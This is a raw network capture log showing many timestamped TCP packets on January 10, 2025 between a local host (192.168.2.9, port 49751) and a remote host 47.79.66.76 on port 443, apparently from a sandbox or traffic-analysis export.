                                                                                                Jan 10, 2025 07:52:12.542241096 CET49751443192.168.2.947.79.66.76
                                                                                                Jan 10, 2025 07:52:12.547343969 CET4434975147.79.66.76192.168.2.9
                                                                                                Jan 10, 2025 07:52:12.547368050 CET4434975147.79.66.76192.168.2.9
                                                                                                Jan 10, 2025 07:52:12.547435999 CET49751443192.168.2.947.79.66.76
                                                                                                Jan 10, 2025 07:52:12.547435999 CET49751443192.168.2.947.79.66.76
                                                                                                Jan 10, 2025 07:52:12.547456980 CET4434975147.79.66.76192.168.2.9
                                                                                                Jan 10, 2025 07:52:12.547527075 CET49751443192.168.2.947.79.66.76
                                                                                                Jan 10, 2025 07:52:12.553143024 CET4434975147.79.66.76192.168.2.9
                                                                                                Jan 10, 2025 07:52:12.553164959 CET4434975147.79.66.76192.168.2.9
                                                                                                Jan 10, 2025 07:52:12.553217888 CET49751443192.168.2.947.79.66.76
                                                                                                Jan 10, 2025 07:52:12.553239107 CET4434975147.79.66.76192.168.2.9
                                                                                                Jan 10, 2025 07:52:12.553252935 CET49751443192.168.2.947.79.66.76
                                                                                                Jan 10, 2025 07:52:12.553337097 CET49751443192.168.2.947.79.66.76
                                                                                                Jan 10, 2025 07:52:12.559046984 CET4434975147.79.66.76192.168.2.9
                                                                                                Jan 10, 2025 07:52:12.559071064 CET4434975147.79.66.76192.168.2.9
                                                                                                Jan 10, 2025 07:52:12.559159994 CET49751443192.168.2.947.79.66.76
                                                                                                Jan 10, 2025 07:52:12.559159994 CET49751443192.168.2.947.79.66.76
                                                                                                Jan 10, 2025 07:52:12.559179068 CET4434975147.79.66.76192.168.2.9
                                                                                                Jan 10, 2025 07:52:12.559222937 CET49751443192.168.2.947.79.66.76
                                                                                                Jan 10, 2025 07:52:12.595241070 CET4434975147.79.66.76192.168.2.9
                                                                                                Jan 10, 2025 07:52:12.595278978 CET4434975147.79.66.76192.168.2.9
                                                                                                Jan 10, 2025 07:52:12.595326900 CET49751443192.168.2.947.79.66.76
                                                                                                Jan 10, 2025 07:52:12.595338106 CET4434975147.79.66.76192.168.2.9
                                                                                                Jan 10, 2025 07:52:12.595359087 CET49751443192.168.2.947.79.66.76
                                                                                                Jan 10, 2025 07:52:12.595527887 CET49751443192.168.2.947.79.66.76
                                                                                                Jan 10, 2025 07:52:12.597402096 CET4434975147.79.66.76192.168.2.9
                                                                                                Jan 10, 2025 07:52:12.597423077 CET4434975147.79.66.76192.168.2.9
                                                                                                Jan 10, 2025 07:52:12.597467899 CET49751443192.168.2.947.79.66.76
                                                                                                Jan 10, 2025 07:52:12.597476006 CET4434975147.79.66.76192.168.2.9
                                                                                                Jan 10, 2025 07:52:12.597651958 CET49751443192.168.2.947.79.66.76
                                                                                                Jan 10, 2025 07:52:12.597651958 CET49751443192.168.2.947.79.66.76
                                                                                                Jan 10, 2025 07:52:12.608413935 CET4434975147.79.66.76192.168.2.9
                                                                                                Jan 10, 2025 07:52:12.608448982 CET4434975147.79.66.76192.168.2.9
                                                                                                Jan 10, 2025 07:52:12.608495951 CET49751443192.168.2.947.79.66.76
                                                                                                Jan 10, 2025 07:52:12.608517885 CET4434975147.79.66.76192.168.2.9
                                                                                                Jan 10, 2025 07:52:12.608721018 CET49751443192.168.2.947.79.66.76
                                                                                                Jan 10, 2025 07:52:12.608721018 CET49751443192.168.2.947.79.66.76
                                                                                                Jan 10, 2025 07:52:12.631120920 CET4434975147.79.66.76192.168.2.9
                                                                                                Jan 10, 2025 07:52:12.631150007 CET4434975147.79.66.76192.168.2.9
                                                                                                Jan 10, 2025 07:52:12.631298065 CET49751443192.168.2.947.79.66.76
                                                                                                Jan 10, 2025 07:52:12.631298065 CET49751443192.168.2.947.79.66.76
                                                                                                Jan 10, 2025 07:52:12.631320000 CET4434975147.79.66.76192.168.2.9
                                                                                                Jan 10, 2025 07:52:12.631365061 CET49751443192.168.2.947.79.66.76
                                                                                                Jan 10, 2025 07:52:12.634325981 CET4434975147.79.66.76192.168.2.9
                                                                                                Jan 10, 2025 07:52:12.634352922 CET4434975147.79.66.76192.168.2.9
                                                                                                Jan 10, 2025 07:52:12.634398937 CET49751443192.168.2.947.79.66.76
                                                                                                Jan 10, 2025 07:52:12.634419918 CET4434975147.79.66.76192.168.2.9
                                                                                                Jan 10, 2025 07:52:12.634468079 CET49751443192.168.2.947.79.66.76
                                                                                                Jan 10, 2025 07:52:12.634608984 CET49751443192.168.2.947.79.66.76
                                                                                                Jan 10, 2025 07:52:12.639820099 CET4434975147.79.66.76192.168.2.9
                                                                                                Jan 10, 2025 07:52:12.639841080 CET4434975147.79.66.76192.168.2.9
                                                                                                Jan 10, 2025 07:52:12.640137911 CET49751443192.168.2.947.79.66.76
                                                                                                Jan 10, 2025 07:52:12.640137911 CET49751443192.168.2.947.79.66.76
                                                                                                Jan 10, 2025 07:52:12.640158892 CET4434975147.79.66.76192.168.2.9
                                                                                                Jan 10, 2025 07:52:12.640209913 CET49751443192.168.2.947.79.66.76
                                                                                                Jan 10, 2025 07:52:12.645544052 CET4434975147.79.66.76192.168.2.9
                                                                                                Jan 10, 2025 07:52:12.645575047 CET4434975147.79.66.76192.168.2.9
                                                                                                Jan 10, 2025 07:52:12.645626068 CET49751443192.168.2.947.79.66.76
                                                                                                Jan 10, 2025 07:52:12.645644903 CET4434975147.79.66.76192.168.2.9
                                                                                                Jan 10, 2025 07:52:12.645665884 CET49751443192.168.2.947.79.66.76
                                                                                                Jan 10, 2025 07:52:12.645973921 CET49751443192.168.2.947.79.66.76
                                                                                                Jan 10, 2025 07:52:12.651657104 CET4434975147.79.66.76192.168.2.9
                                                                                                Jan 10, 2025 07:52:12.651690006 CET4434975147.79.66.76192.168.2.9
                                                                                                Jan 10, 2025 07:52:12.651738882 CET49751443192.168.2.947.79.66.76
                                                                                                Jan 10, 2025 07:52:12.651755095 CET4434975147.79.66.76192.168.2.9
                                                                                                Jan 10, 2025 07:52:12.651843071 CET49751443192.168.2.947.79.66.76
                                                                                                Jan 10, 2025 07:52:12.652009964 CET49751443192.168.2.947.79.66.76
                                                                                                Jan 10, 2025 07:52:12.687900066 CET4434975147.79.66.76192.168.2.9
                                                                                                Jan 10, 2025 07:52:12.687932968 CET4434975147.79.66.76192.168.2.9
                                                                                                Jan 10, 2025 07:52:12.688000917 CET49751443192.168.2.947.79.66.76
                                                                                                Jan 10, 2025 07:52:12.688018084 CET4434975147.79.66.76192.168.2.9
                                                                                                Jan 10, 2025 07:52:12.688046932 CET49751443192.168.2.947.79.66.76
                                                                                                Jan 10, 2025 07:52:12.688076019 CET49751443192.168.2.947.79.66.76
                                                                                                Jan 10, 2025 07:52:12.689919949 CET4434975147.79.66.76192.168.2.9
                                                                                                Jan 10, 2025 07:52:12.689949989 CET4434975147.79.66.76192.168.2.9
                                                                                                Jan 10, 2025 07:52:12.690004110 CET49751443192.168.2.947.79.66.76
                                                                                                Jan 10, 2025 07:52:12.690011978 CET4434975147.79.66.76192.168.2.9
                                                                                                Jan 10, 2025 07:52:12.690469980 CET49751443192.168.2.947.79.66.76
                                                                                                Jan 10, 2025 07:52:12.690469980 CET49751443192.168.2.947.79.66.76
                                                                                                Jan 10, 2025 07:52:12.700819969 CET4434975147.79.66.76192.168.2.9
                                                                                                Jan 10, 2025 07:52:12.700850010 CET4434975147.79.66.76192.168.2.9
                                                                                                Jan 10, 2025 07:52:12.700917006 CET49751443192.168.2.947.79.66.76
                                                                                                Jan 10, 2025 07:52:12.700926065 CET4434975147.79.66.76192.168.2.9
                                                                                                Jan 10, 2025 07:52:12.700967073 CET49751443192.168.2.947.79.66.76
                                                                                                Jan 10, 2025 07:52:12.700967073 CET49751443192.168.2.947.79.66.76
                                                                                                Jan 10, 2025 07:52:12.723671913 CET4434975147.79.66.76192.168.2.9
                                                                                                Jan 10, 2025 07:52:12.723704100 CET4434975147.79.66.76192.168.2.9
                                                                                                Jan 10, 2025 07:52:12.723845005 CET49751443192.168.2.947.79.66.76
                                                                                                Jan 10, 2025 07:52:12.723845959 CET49751443192.168.2.947.79.66.76
                                                                                                Jan 10, 2025 07:52:12.723860979 CET4434975147.79.66.76192.168.2.9
                                                                                                Jan 10, 2025 07:52:12.724054098 CET49751443192.168.2.947.79.66.76
                                                                                                Jan 10, 2025 07:52:12.726799965 CET4434975147.79.66.76192.168.2.9
                                                                                                Jan 10, 2025 07:52:12.726823092 CET4434975147.79.66.76192.168.2.9
                                                                                                Jan 10, 2025 07:52:12.726947069 CET49751443192.168.2.947.79.66.76
                                                                                                Jan 10, 2025 07:52:12.726947069 CET49751443192.168.2.947.79.66.76
                                                                                                Jan 10, 2025 07:52:12.726963043 CET4434975147.79.66.76192.168.2.9
                                                                                                Jan 10, 2025 07:52:12.727052927 CET49751443192.168.2.947.79.66.76
                                                                                                Jan 10, 2025 07:52:12.732217073 CET4434975147.79.66.76192.168.2.9
                                                                                                Jan 10, 2025 07:52:12.732239008 CET4434975147.79.66.76192.168.2.9
                                                                                                Jan 10, 2025 07:52:12.732327938 CET49751443192.168.2.947.79.66.76
                                                                                                Jan 10, 2025 07:52:12.732327938 CET49751443192.168.2.947.79.66.76
                                                                                                Jan 10, 2025 07:52:12.732347012 CET4434975147.79.66.76192.168.2.9
                                                                                                Jan 10, 2025 07:52:12.732526064 CET49751443192.168.2.947.79.66.76
                                                                                                Jan 10, 2025 07:52:12.738073111 CET4434975147.79.66.76192.168.2.9
                                                                                                Jan 10, 2025 07:52:12.738094091 CET4434975147.79.66.76192.168.2.9
                                                                                                Jan 10, 2025 07:52:12.738296032 CET49751443192.168.2.947.79.66.76
                                                                                                Jan 10, 2025 07:52:12.738296032 CET49751443192.168.2.947.79.66.76
                                                                                                Jan 10, 2025 07:52:12.738321066 CET4434975147.79.66.76192.168.2.9
                                                                                                Jan 10, 2025 07:52:12.738502026 CET49751443192.168.2.947.79.66.76
                                                                                                Jan 10, 2025 07:52:12.744097948 CET4434975147.79.66.76192.168.2.9
                                                                                                Jan 10, 2025 07:52:12.744131088 CET4434975147.79.66.76192.168.2.9
                                                                                                Jan 10, 2025 07:52:12.744240046 CET49751443192.168.2.947.79.66.76
                                                                                                Jan 10, 2025 07:52:12.744240046 CET49751443192.168.2.947.79.66.76
                                                                                                Jan 10, 2025 07:52:12.744255066 CET4434975147.79.66.76192.168.2.9
                                                                                                Jan 10, 2025 07:52:12.744348049 CET49751443192.168.2.947.79.66.76
                                                                                                Jan 10, 2025 07:52:12.780246973 CET4434975147.79.66.76192.168.2.9
                                                                                                Jan 10, 2025 07:52:12.780289888 CET4434975147.79.66.76192.168.2.9
                                                                                                Jan 10, 2025 07:52:12.780369043 CET49751443192.168.2.947.79.66.76
                                                                                                Jan 10, 2025 07:52:12.780369043 CET49751443192.168.2.947.79.66.76
                                                                                                Jan 10, 2025 07:52:12.780376911 CET4434975147.79.66.76192.168.2.9
                                                                                                Jan 10, 2025 07:52:12.780473948 CET49751443192.168.2.947.79.66.76
                                                                                                Jan 10, 2025 07:52:12.782356977 CET4434975147.79.66.76192.168.2.9
                                                                                                Jan 10, 2025 07:52:12.782396078 CET4434975147.79.66.76192.168.2.9
                                                                                                Jan 10, 2025 07:52:12.782625914 CET49751443192.168.2.947.79.66.76
                                                                                                Jan 10, 2025 07:52:12.782625914 CET49751443192.168.2.947.79.66.76
                                                                                                Jan 10, 2025 07:52:12.782636881 CET4434975147.79.66.76192.168.2.9
                                                                                                Jan 10, 2025 07:52:12.782691956 CET49751443192.168.2.947.79.66.76
                                                                                                Jan 10, 2025 07:52:12.793359995 CET4434975147.79.66.76192.168.2.9
                                                                                                Jan 10, 2025 07:52:12.793390036 CET4434975147.79.66.76192.168.2.9
                                                                                                Jan 10, 2025 07:52:12.793920994 CET49751443192.168.2.947.79.66.76
                                                                                                Jan 10, 2025 07:52:12.793920994 CET49751443192.168.2.947.79.66.76
                                                                                                Jan 10, 2025 07:52:12.793930054 CET4434975147.79.66.76192.168.2.9
                                                                                                Jan 10, 2025 07:52:12.793999910 CET49751443192.168.2.947.79.66.76
                                                                                                Jan 10, 2025 07:52:12.815980911 CET4434975147.79.66.76192.168.2.9
                                                                                                Jan 10, 2025 07:52:12.816014051 CET4434975147.79.66.76192.168.2.9
                                                                                                Jan 10, 2025 07:52:12.816118956 CET49751443192.168.2.947.79.66.76
                                                                                                Jan 10, 2025 07:52:12.816118956 CET49751443192.168.2.947.79.66.76
                                                                                                Jan 10, 2025 07:52:12.816128969 CET4434975147.79.66.76192.168.2.9
                                                                                                Jan 10, 2025 07:52:12.816281080 CET49751443192.168.2.947.79.66.76
                                                                                                Jan 10, 2025 07:52:12.819335938 CET4434975147.79.66.76192.168.2.9
                                                                                                Jan 10, 2025 07:52:12.819365025 CET4434975147.79.66.76192.168.2.9
                                                                                                Jan 10, 2025 07:52:12.819407940 CET49751443192.168.2.947.79.66.76
                                                                                                Jan 10, 2025 07:52:12.819432020 CET4434975147.79.66.76192.168.2.9
                                                                                                Jan 10, 2025 07:52:12.819451094 CET49751443192.168.2.947.79.66.76
                                                                                                Jan 10, 2025 07:52:12.819713116 CET49751443192.168.2.947.79.66.76
                                                                                                Jan 10, 2025 07:52:12.824824095 CET4434975147.79.66.76192.168.2.9
                                                                                                Jan 10, 2025 07:52:12.824857950 CET4434975147.79.66.76192.168.2.9
                                                                                                Jan 10, 2025 07:52:12.825004101 CET49751443192.168.2.947.79.66.76
                                                                                                Jan 10, 2025 07:52:12.825004101 CET49751443192.168.2.947.79.66.76
                                                                                                Jan 10, 2025 07:52:12.825025082 CET4434975147.79.66.76192.168.2.9
                                                                                                Jan 10, 2025 07:52:12.825115919 CET49751443192.168.2.947.79.66.76
                                                                                                Jan 10, 2025 07:52:12.830522060 CET4434975147.79.66.76192.168.2.9
                                                                                                Jan 10, 2025 07:52:12.830559969 CET4434975147.79.66.76192.168.2.9
                                                                                                Jan 10, 2025 07:52:12.830602884 CET49751443192.168.2.947.79.66.76
                                                                                                Jan 10, 2025 07:52:12.830621958 CET4434975147.79.66.76192.168.2.9
                                                                                                Jan 10, 2025 07:52:12.830635071 CET49751443192.168.2.947.79.66.76
                                                                                                Jan 10, 2025 07:52:12.830727100 CET49751443192.168.2.947.79.66.76
                                                                                                Jan 10, 2025 07:52:12.836714029 CET4434975147.79.66.76192.168.2.9
                                                                                                Jan 10, 2025 07:52:12.836746931 CET4434975147.79.66.76192.168.2.9
                                                                                                Jan 10, 2025 07:52:12.836808920 CET49751443192.168.2.947.79.66.76
                                                                                                Jan 10, 2025 07:52:12.836817026 CET4434975147.79.66.76192.168.2.9
                                                                                                Jan 10, 2025 07:52:12.836834908 CET49751443192.168.2.947.79.66.76
                                                                                                Jan 10, 2025 07:52:12.836924076 CET49751443192.168.2.947.79.66.76
                                                                                                Jan 10, 2025 07:52:12.872762918 CET4434975147.79.66.76192.168.2.9
                                                                                                Jan 10, 2025 07:52:12.872800112 CET4434975147.79.66.76192.168.2.9
                                                                                                Jan 10, 2025 07:52:12.872870922 CET49751443192.168.2.947.79.66.76
                                                                                                Jan 10, 2025 07:52:12.872870922 CET49751443192.168.2.947.79.66.76
                                                                                                Jan 10, 2025 07:52:12.872885942 CET4434975147.79.66.76192.168.2.9
                                                                                                Jan 10, 2025 07:52:12.872961998 CET49751443192.168.2.947.79.66.76
                                                                                                Jan 10, 2025 07:52:12.874856949 CET4434975147.79.66.76192.168.2.9
                                                                                                Jan 10, 2025 07:52:12.874903917 CET4434975147.79.66.76192.168.2.9
                                                                                                Jan 10, 2025 07:52:12.874968052 CET49751443192.168.2.947.79.66.76
                                                                                                Jan 10, 2025 07:52:12.874968052 CET49751443192.168.2.947.79.66.76
                                                                                                Jan 10, 2025 07:52:12.874979019 CET4434975147.79.66.76192.168.2.9
                                                                                                Jan 10, 2025 07:52:12.875030041 CET49751443192.168.2.947.79.66.76
                                                                                                Jan 10, 2025 07:52:12.885787964 CET4434975147.79.66.76192.168.2.9
                                                                                                Jan 10, 2025 07:52:12.885823011 CET4434975147.79.66.76192.168.2.9
                                                                                                Jan 10, 2025 07:52:12.885881901 CET49751443192.168.2.947.79.66.76
                                                                                                Jan 10, 2025 07:52:12.885910988 CET4434975147.79.66.76192.168.2.9
                                                                                                Jan 10, 2025 07:52:12.885950089 CET49751443192.168.2.947.79.66.76
                                                                                                Jan 10, 2025 07:52:12.886096954 CET49751443192.168.2.947.79.66.76
                                                                                                Jan 10, 2025 07:52:12.908441067 CET4434975147.79.66.76192.168.2.9
                                                                                                Jan 10, 2025 07:52:12.908476114 CET4434975147.79.66.76192.168.2.9
                                                                                                Jan 10, 2025 07:52:12.908538103 CET49751443192.168.2.947.79.66.76
                                                                                                Jan 10, 2025 07:52:12.908560038 CET4434975147.79.66.76192.168.2.9
                                                                                                Jan 10, 2025 07:52:12.908577919 CET49751443192.168.2.947.79.66.76
                                                                                                Jan 10, 2025 07:52:12.908623934 CET49751443192.168.2.947.79.66.76
                                                                                                Jan 10, 2025 07:52:12.911813021 CET4434975147.79.66.76192.168.2.9
                                                                                                Jan 10, 2025 07:52:12.911835909 CET4434975147.79.66.76192.168.2.9
                                                                                                Jan 10, 2025 07:52:12.911909103 CET49751443192.168.2.947.79.66.76
                                                                                                Jan 10, 2025 07:52:12.911909103 CET49751443192.168.2.947.79.66.76
                                                                                                Jan 10, 2025 07:52:12.911920071 CET4434975147.79.66.76192.168.2.9
                                                                                                Jan 10, 2025 07:52:12.912355900 CET49751443192.168.2.947.79.66.76
                                                                                                Jan 10, 2025 07:52:12.917293072 CET4434975147.79.66.76192.168.2.9
                                                                                                Jan 10, 2025 07:52:12.917339087 CET4434975147.79.66.76192.168.2.9
                                                                                                Jan 10, 2025 07:52:12.917368889 CET49751443192.168.2.947.79.66.76
                                                                                                Jan 10, 2025 07:52:12.917390108 CET4434975147.79.66.76192.168.2.9
                                                                                                Jan 10, 2025 07:52:12.917428017 CET49751443192.168.2.947.79.66.76
                                                                                                Jan 10, 2025 07:52:12.917428017 CET49751443192.168.2.947.79.66.76
                                                                                                Jan 10, 2025 07:52:12.923012972 CET4434975147.79.66.76192.168.2.9
                                                                                                Jan 10, 2025 07:52:12.923044920 CET4434975147.79.66.76192.168.2.9
                                                                                                Jan 10, 2025 07:52:12.923141003 CET49751443192.168.2.947.79.66.76
                                                                                                Jan 10, 2025 07:52:12.923141003 CET49751443192.168.2.947.79.66.76
                                                                                                Jan 10, 2025 07:52:12.923150063 CET4434975147.79.66.76192.168.2.9
                                                                                                Jan 10, 2025 07:52:12.923357964 CET49751443192.168.2.947.79.66.76
                                                                                                Jan 10, 2025 07:52:12.929162025 CET4434975147.79.66.76192.168.2.9
                                                                                                Jan 10, 2025 07:52:12.929191113 CET4434975147.79.66.76192.168.2.9
                                                                                                Jan 10, 2025 07:52:12.929533005 CET49751443192.168.2.947.79.66.76
                                                                                                Jan 10, 2025 07:52:12.929533958 CET49751443192.168.2.947.79.66.76
                                                                                                Jan 10, 2025 07:52:12.929542065 CET4434975147.79.66.76192.168.2.9
                                                                                                Jan 10, 2025 07:52:12.929702044 CET49751443192.168.2.947.79.66.76
                                                                                                Jan 10, 2025 07:52:12.965176105 CET4434975147.79.66.76192.168.2.9
                                                                                                Jan 10, 2025 07:52:12.965214014 CET4434975147.79.66.76192.168.2.9
                                                                                                Jan 10, 2025 07:52:12.965296984 CET49751443192.168.2.947.79.66.76
                                                                                                Jan 10, 2025 07:52:12.965296984 CET49751443192.168.2.947.79.66.76
                                                                                                Jan 10, 2025 07:52:12.965317011 CET4434975147.79.66.76192.168.2.9
                                                                                                Jan 10, 2025 07:52:12.965491056 CET49751443192.168.2.947.79.66.76
                                                                                                Jan 10, 2025 07:52:12.967242002 CET4434975147.79.66.76192.168.2.9
                                                                                                Jan 10, 2025 07:52:12.967269897 CET4434975147.79.66.76192.168.2.9
                                                                                                Jan 10, 2025 07:52:12.967318058 CET49751443192.168.2.947.79.66.76
                                                                                                Jan 10, 2025 07:52:12.967324018 CET4434975147.79.66.76192.168.2.9
                                                                                                Jan 10, 2025 07:52:12.967338085 CET49751443192.168.2.947.79.66.76
                                                                                                Jan 10, 2025 07:52:12.967473984 CET49751443192.168.2.947.79.66.76
                                                                                                Jan 10, 2025 07:52:12.978364944 CET4434975147.79.66.76192.168.2.9
                                                                                                Jan 10, 2025 07:52:12.978446960 CET4434975147.79.66.76192.168.2.9
                                                                                                Jan 10, 2025 07:52:12.978468895 CET49751443192.168.2.947.79.66.76
                                                                                                Jan 10, 2025 07:52:12.978494883 CET4434975147.79.66.76192.168.2.9
                                                                                                Jan 10, 2025 07:52:12.978533030 CET49751443192.168.2.947.79.66.76
                                                                                                Jan 10, 2025 07:52:12.978533030 CET49751443192.168.2.947.79.66.76
                                                                                                Jan 10, 2025 07:52:13.000988007 CET4434975147.79.66.76192.168.2.9
                                                                                                Jan 10, 2025 07:52:13.001043081 CET4434975147.79.66.76192.168.2.9
                                                                                                Jan 10, 2025 07:52:13.001101971 CET49751443192.168.2.947.79.66.76
                                                                                                Jan 10, 2025 07:52:13.001101971 CET49751443192.168.2.947.79.66.76
                                                                                                Jan 10, 2025 07:52:13.001113892 CET4434975147.79.66.76192.168.2.9
                                                                                                Jan 10, 2025 07:52:13.001161098 CET49751443192.168.2.947.79.66.76
                                                                                                Jan 10, 2025 07:52:13.004352093 CET4434975147.79.66.76192.168.2.9
                                                                                                Jan 10, 2025 07:52:13.004420042 CET4434975147.79.66.76192.168.2.9
                                                                                                Jan 10, 2025 07:52:13.004436016 CET49751443192.168.2.947.79.66.76
                                                                                                Jan 10, 2025 07:52:13.004447937 CET4434975147.79.66.76192.168.2.9
                                                                                                Jan 10, 2025 07:52:13.004504919 CET49751443192.168.2.947.79.66.76
                                                                                                Jan 10, 2025 07:52:13.004604101 CET49751443192.168.2.947.79.66.76
                                                                                                Jan 10, 2025 07:52:13.018009901 CET4434975147.79.66.76192.168.2.9
                                                                                                Jan 10, 2025 07:52:13.018039942 CET4434975147.79.66.76192.168.2.9
                                                                                                Jan 10, 2025 07:52:13.018102884 CET49751443192.168.2.947.79.66.76
                                                                                                Jan 10, 2025 07:52:13.018114090 CET4434975147.79.66.76192.168.2.9
                                                                                                Jan 10, 2025 07:52:13.018147945 CET49751443192.168.2.947.79.66.76
                                                                                                Jan 10, 2025 07:52:13.018147945 CET49751443192.168.2.947.79.66.76
                                                                                                Jan 10, 2025 07:52:13.018734932 CET4434975147.79.66.76192.168.2.9
                                                                                                Jan 10, 2025 07:52:13.018758059 CET4434975147.79.66.76192.168.2.9
                                                                                                Jan 10, 2025 07:52:13.018857002 CET49751443192.168.2.947.79.66.76
                                                                                                Jan 10, 2025 07:52:13.018857002 CET49751443192.168.2.947.79.66.76
                                                                                                Jan 10, 2025 07:52:13.018865108 CET4434975147.79.66.76192.168.2.9
                                                                                                Jan 10, 2025 07:52:13.018940926 CET49751443192.168.2.947.79.66.76
                                                                                                Jan 10, 2025 07:52:13.021749973 CET4434975147.79.66.76192.168.2.9
                                                                                                Jan 10, 2025 07:52:13.021773100 CET4434975147.79.66.76192.168.2.9
                                                                                                Jan 10, 2025 07:52:13.021841049 CET49751443192.168.2.947.79.66.76
                                                                                                Jan 10, 2025 07:52:13.021848917 CET4434975147.79.66.76192.168.2.9
                                                                                                Jan 10, 2025 07:52:13.021886110 CET49751443192.168.2.947.79.66.76
                                                                                                Jan 10, 2025 07:52:13.021886110 CET49751443192.168.2.947.79.66.76
                                                                                                Jan 10, 2025 07:52:13.057998896 CET4434975147.79.66.76192.168.2.9
                                                                                                Jan 10, 2025 07:52:13.058058977 CET4434975147.79.66.76192.168.2.9
                                                                                                Jan 10, 2025 07:52:13.058082104 CET49751443192.168.2.947.79.66.76
                                                                                                Jan 10, 2025 07:52:13.058093071 CET4434975147.79.66.76192.168.2.9
                                                                                                Jan 10, 2025 07:52:13.058110952 CET49751443192.168.2.947.79.66.76
                                                                                                Jan 10, 2025 07:52:13.058135986 CET49751443192.168.2.947.79.66.76
                                                                                                Jan 10, 2025 07:52:13.059880018 CET4434975147.79.66.76192.168.2.9
                                                                                                Jan 10, 2025 07:52:13.059926987 CET4434975147.79.66.76192.168.2.9
                                                                                                Jan 10, 2025 07:52:13.059954882 CET49751443192.168.2.947.79.66.76
                                                                                                Jan 10, 2025 07:52:13.059962034 CET4434975147.79.66.76192.168.2.9
                                                                                                Jan 10, 2025 07:52:13.059981108 CET49751443192.168.2.947.79.66.76
                                                                                                Jan 10, 2025 07:52:13.059994936 CET49751443192.168.2.947.79.66.76
                                                                                                Jan 10, 2025 07:52:13.070820093 CET4434975147.79.66.76192.168.2.9
                                                                                                Jan 10, 2025 07:52:13.070887089 CET4434975147.79.66.76192.168.2.9
                                                                                                Jan 10, 2025 07:52:13.070899963 CET49751443192.168.2.947.79.66.76
                                                                                                Jan 10, 2025 07:52:13.070919991 CET4434975147.79.66.76192.168.2.9
                                                                                                Jan 10, 2025 07:52:13.070947886 CET49751443192.168.2.947.79.66.76
                                                                                                Jan 10, 2025 07:52:13.070957899 CET49751443192.168.2.947.79.66.76
                                                                                                Jan 10, 2025 07:52:13.093722105 CET4434975147.79.66.76192.168.2.9
                                                                                                Jan 10, 2025 07:52:13.093760967 CET4434975147.79.66.76192.168.2.9
                                                                                                Jan 10, 2025 07:52:13.093811035 CET49751443192.168.2.947.79.66.76
                                                                                                Jan 10, 2025 07:52:13.093825102 CET4434975147.79.66.76192.168.2.9
                                                                                                Jan 10, 2025 07:52:13.093848944 CET49751443192.168.2.947.79.66.76
                                                                                                Jan 10, 2025 07:52:13.093869925 CET49751443192.168.2.947.79.66.76
                                                                                                Jan 10, 2025 07:52:13.096751928 CET4434975147.79.66.76192.168.2.9
                                                                                                Jan 10, 2025 07:52:13.096775055 CET4434975147.79.66.76192.168.2.9
                                                                                                Jan 10, 2025 07:52:13.096822977 CET49751443192.168.2.947.79.66.76
                                                                                                Jan 10, 2025 07:52:13.096829891 CET4434975147.79.66.76192.168.2.9
                                                                                                Jan 10, 2025 07:52:13.096860886 CET49751443192.168.2.947.79.66.76
                                                                                                Jan 10, 2025 07:52:13.096878052 CET49751443192.168.2.947.79.66.76
                                                                                                Jan 10, 2025 07:52:13.110364914 CET4434975147.79.66.76192.168.2.9
                                                                                                Jan 10, 2025 07:52:13.110430002 CET4434975147.79.66.76192.168.2.9
                                                                                                Jan 10, 2025 07:52:13.110445976 CET49751443192.168.2.947.79.66.76
                                                                                                Jan 10, 2025 07:52:13.110455036 CET4434975147.79.66.76192.168.2.9
                                                                                                Jan 10, 2025 07:52:13.110486031 CET49751443192.168.2.947.79.66.76
                                                                                                Jan 10, 2025 07:52:13.110515118 CET49751443192.168.2.947.79.66.76
                                                                                                Jan 10, 2025 07:52:13.110905886 CET4434975147.79.66.76192.168.2.9
                                                                                                Jan 10, 2025 07:52:13.110961914 CET4434975147.79.66.76192.168.2.9
                                                                                                Jan 10, 2025 07:52:13.110980988 CET49751443192.168.2.947.79.66.76
                                                                                                Jan 10, 2025 07:52:13.110987902 CET4434975147.79.66.76192.168.2.9
                                                                                                Jan 10, 2025 07:52:13.111011982 CET49751443192.168.2.947.79.66.76
                                                                                                Jan 10, 2025 07:52:13.111022949 CET49751443192.168.2.947.79.66.76
                                                                                                Jan 10, 2025 07:52:13.114170074 CET4434975147.79.66.76192.168.2.9
                                                                                                Jan 10, 2025 07:52:13.114232063 CET4434975147.79.66.76192.168.2.9
                                                                                                Jan 10, 2025 07:52:13.114250898 CET49751443192.168.2.947.79.66.76
                                                                                                Jan 10, 2025 07:52:13.114283085 CET4434975147.79.66.76192.168.2.9
                                                                                                Jan 10, 2025 07:52:13.114346027 CET49751443192.168.2.947.79.66.76
                                                                                                Jan 10, 2025 07:52:13.150396109 CET4434975147.79.66.76192.168.2.9
                                                                                                Jan 10, 2025 07:52:13.150425911 CET4434975147.79.66.76192.168.2.9
                                                                                                Jan 10, 2025 07:52:13.150461912 CET49751443192.168.2.947.79.66.76
                                                                                                Jan 10, 2025 07:52:13.150479078 CET4434975147.79.66.76192.168.2.9
                                                                                                Jan 10, 2025 07:52:13.150505066 CET49751443192.168.2.947.79.66.76
                                                                                                Jan 10, 2025 07:52:13.150526047 CET49751443192.168.2.947.79.66.76
                                                                                                Jan 10, 2025 07:52:13.152268887 CET4434975147.79.66.76192.168.2.9
                                                                                                Jan 10, 2025 07:52:13.152292967 CET4434975147.79.66.76192.168.2.9
                                                                                                Jan 10, 2025 07:52:13.152331114 CET49751443192.168.2.947.79.66.76
                                                                                                Jan 10, 2025 07:52:13.152337074 CET4434975147.79.66.76192.168.2.9
                                                                                                Jan 10, 2025 07:52:13.152364016 CET49751443192.168.2.947.79.66.76
                                                                                                Jan 10, 2025 07:52:13.152378082 CET49751443192.168.2.947.79.66.76
                                                                                                Jan 10, 2025 07:52:13.163235903 CET4434975147.79.66.76192.168.2.9
                                                                                                Jan 10, 2025 07:52:13.163259029 CET4434975147.79.66.76192.168.2.9
                                                                                                Jan 10, 2025 07:52:13.163300037 CET49751443192.168.2.947.79.66.76
                                                                                                Jan 10, 2025 07:52:13.163311005 CET4434975147.79.66.76192.168.2.9
                                                                                                Jan 10, 2025 07:52:13.163336039 CET49751443192.168.2.947.79.66.76
                                                                                                Jan 10, 2025 07:52:13.164817095 CET49751443192.168.2.947.79.66.76
                                                                                                Jan 10, 2025 07:52:13.186309099 CET4434975147.79.66.76192.168.2.9
                                                                                                Jan 10, 2025 07:52:13.186340094 CET4434975147.79.66.76192.168.2.9
                                                                                                Jan 10, 2025 07:52:13.186387062 CET49751443192.168.2.947.79.66.76
                                                                                                Jan 10, 2025 07:52:13.186397076 CET4434975147.79.66.76192.168.2.9
                                                                                                Jan 10, 2025 07:52:13.186424017 CET49751443192.168.2.947.79.66.76
